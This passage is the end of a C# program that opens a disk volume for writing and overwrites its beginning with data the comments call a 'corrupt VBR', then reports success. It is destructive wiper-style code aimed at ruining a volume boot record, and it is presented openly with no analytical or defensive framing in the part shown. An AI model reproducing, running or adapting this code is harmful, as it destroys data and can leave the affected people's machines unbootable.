                // Open the specified volume for writing the VBR
                using (FileStream fs = new FileStream(volumePath, FileMode.Open, FileAccess.Write))
                {
                    // Write the corrupt data (VBR) to the beginning of the volume
                    fs.Write(vbrData, 0, vbrData.Length);
                }

                Console.WriteLine("Corrupt VBR written successfully!");
            }
            catch (Exception ex)
            {
                Console.WriteLine($"Failed to write corrupt VBR: {ex.Message}");
            }
        }
    }
}
